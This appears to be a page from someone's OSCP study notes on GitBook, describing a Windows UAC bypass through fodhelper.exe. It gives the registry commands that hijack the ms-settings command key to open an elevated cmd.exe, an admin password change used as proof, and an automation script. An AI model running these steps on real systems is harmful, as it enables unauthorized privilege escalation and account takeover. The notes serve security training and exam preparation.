hackervegas001
  • Introduction
  • oscp notes include Active Directory 2023
    • Active Directory
      • Enumeration
        • Traditional Approach
        • Currently Logged on Users
        • Powerview
          • Bypass AMSI
          • Domain User Enum
          • Domain Group Enumeration
          • Domain Computer and Server Enum
          • GPO and OU Enum
          • Domain Shares Enum
          • ACL Enum
        • ADRecon
        • BloodHound
      • Authentication
        • Password Hash Dumping
        • Service Account Attack Kerberoasting Attack
          • using mimikatz
          • using Rubeus
          • Using Impacket
        • AS-REP Roasting
        • Password Guessing
        • SAM for windows password
        • password/hash bruteforcing
      • Lateral Movement
        • Pass the hash
        • OverPass the hash
        • Silver Ticket Attack
        • Pass the hash attack
      • Persistence
        • Golden ticket attack
        • Domain Controller synchronization-Dumping all hashes
      • Misc
        • Login method
        • nt authority\system
    • Windows Priv Esc
      • important links
      • Enumeration
      • checking tools
        • winpeas
        • Windows exploit suggester
        • Sysinternals tools
        • Powerup
      • Escalation Path
        • UAC Bypass
        • Binary hijacking / Insecure file permissions
        • Unquoted Service path
        • kernel exploit
        • Potato attack (SEimpersonation)
          • Juicypotato
          • Printspoofer
          • JuicyPotatoNG
        • DLL/EXE Hijacking
        • Service Binary hijacking
        • Exploit msi file
    • Linux Priv Esc
      • Enumeration
      • Escalation path
        • Cron case
        • Editable /etc/passwd
        • kernel exploit
        • CP SUID
        • aria2c SUID
        • systemctl SUID
    • Commands
      • cut
      • awk
      • sed
    • Tools
      • Netcat
      • Powershell
      • Powercat
      • Nmap
      • nmblookup
      • smbclient
      • enum4linux
      • Nikto
      • Certutil (wget for windows)
      • msfvenom payload for powershell
      • iwr like wget for windows
      • ldapsearch
    • Enumeration
      • DNS Enumeration
      • Port Scanning
      • SMB Enumeration
      • NFS Enumeration
      • SMTP Enumeration
      • SNMP Enumeration
    • Web Applicaton Attacks
      • File Inclusion Vuln
      • sqli
      • misc
      • directory bruteforcing
    • files transfers
      • From Windows
      • To Windows
    • Antivirus Evasion
      • Using script in powershell
      • Using Shellter Tool
      • Veil tool
    • client side attacks
      • Exploiting Microsoft Office
        • Object Linking and Embedding
        • Macro
          • Macro Manually
          • Macro using Minitrue tool
      • Code execution via Windows Library Files
    • Port and Services
      • FTP 21
      • Pop3 110
      • smb 139 445
        • smb enumeration
          • SMB Enum
        • symlink traversal
      • SMTP 25 Enumeration
      • ssh 22
      • ms-sql 1433
      • tftp, udp port 69
      • snmp 161 udp
      • VNC PORT 5801 5901
      • UnrealIRCd IRC service
      • mysql 3306
    • Password Attacks
      • Standard Wordlist
      • Bruteforce Wordlist (Crunch)
      • Network Service Attack
        • Medusa tool
        • RDP attack using Crowbar
        • Hydra
      • Password Cracking
    • Port forwarding and Tunneling
      • Chisel (http Tunneling)
      • Port Forwarding with Rinetd tool
      • ssh Tunneling
        • Local Port Forwarding
        • Remote Port Forwarding
        • Dynamic Port Forwarding
      • Plink for windows
      • Netsh for windows
      • SShuttle
    • Misc
      • Port Scanning through script
      • Tty full interactive shell
      • rdp error
      • powershell ps1 reverse shell
      • updating wordpress cred via mysql
      • wordpress
        • updating wordpress cred via mysql
      • reverse shell via ssh
    • Powershell Empire
      • Listner, Stager and agent
      • Poweshell modules
        • selection
        • Credentials and privesc
        • lateral movement
  • 🖥️Enumeration
    • 🙂:)
      • Enumeration :)
        • FTP
          • Anonymous login
            • Default FTP Client
            • Web Browser
            • Filezilla
          • Insecure ACL (RW)
          • Dictionary Attack
        • SMB
          • SMB Null/Guest Session
            • smbmap
            • smbclient
            • impacket-smbclient
            • nmap
          • Dictionary Based Attack
            • crackmapexec
            • hydra
        • SSH
        • WinRM
        • RDP
        • SMTP
        • MYsql
        • NFS
        • SNMP
    • Exploitation
      • Windows Exploitation
      • Linux Exploitation
    • Buffer Overflow
    • Active Directory
      • Active Directory All Tools And Scripts
      • Active Directory Post Enumeration
      • Active Directory Post Exploitation
    • 🏁Writeups
      • cyberSecLabs
      • Hackthebox
        • Tjnull list
          • lame
          • brainfuck
      • Pg Play | Vulnhub
      • Pg practice
      • TryHackMe
      • To Do
Powered by GitBook
On this page
  1. oscp notes include Active Directory 2023
  2. Windows Priv Esc
  3. Escalation Path

UAC Bypass

PreviousEscalation PathNextBinary hijacking / Insecure file permissions

Last updated 2 years ago

UAC bypass

User Access Control

********************************************Vulnerable Binary for example : fodhelper.exe

  • Gather info regarding exe integrity level & permission req.

    Tool :- sigcheck.exe

    • In Cmd, cd to SysternalsSuite directory sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

    • It show that Administrator is required and Autoelevate is true

  • Gather info about how this exe interact with file system and windows registry

    Tool : Procmon.exe (process monitor) from sysinternals

    • Open Procmon.exe tool , start fodhelper.exe , Add below filters

    • Filter: Process Name , is , fodhelper.exe , Include

    • Filter: Operation , contains , Reg , Include

    • Filter: Result , is , NAME NOT FOUND , Include

    • Filter: Path , contains , HKCU , Include

    • Now , Apply filter and locate for some interesting path that can be modified For ex: HKCU:\Software\Classes\ms-settings\shell\open\command can be checked.

    • Now , Change Path filter and remove Result Filter: Path , contains , ms-settings\shell\open\command , Include

    • Check If the process can successfully access that key in some other hive, the results will provide us with more clues. Like When HKCU:\Software\Classes\ms-settings\shell\open\command is not found . It locate HKCR which exist and is successful

    • As exe tries to find HKCU:\Software\Classes\ms-settings\shell\open\command first , the path can be modified as we have necessary permission to edit it

    • Add this key with REG utility in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

    • Now, restart the fodhelper.exe and add 1st four filters

    • Vuln exe is looking DelegateExecute in new added key

    • Add DelegateExecute with empty value in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

    • Again , restart the fodhelper.exe and add 1st . 2nd , 4th filters

    • This time it is suucessful but since DelegateExecute is empty , it also look for (Default) entry value of the Shell\open\command registry key. The (Default) entry value is created as null automatically when adding any registry key

    • Replace the empty (Default) value with an executable of our choice, cmd.exe in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

    • Exploit

      • Restart fothelper.exe , it will now open CMD automatically with high intergrity level

      • To check , if we have successfully achieve high integrity , try to change admin password net user admin Ev!lpass

    • Automation tool

      • Import-Module .\Invoke-EventViewer.ps1

      • Invoke-EventViewer cmd.exe

https://github.com/CsEnox/EventViewer-UACBypass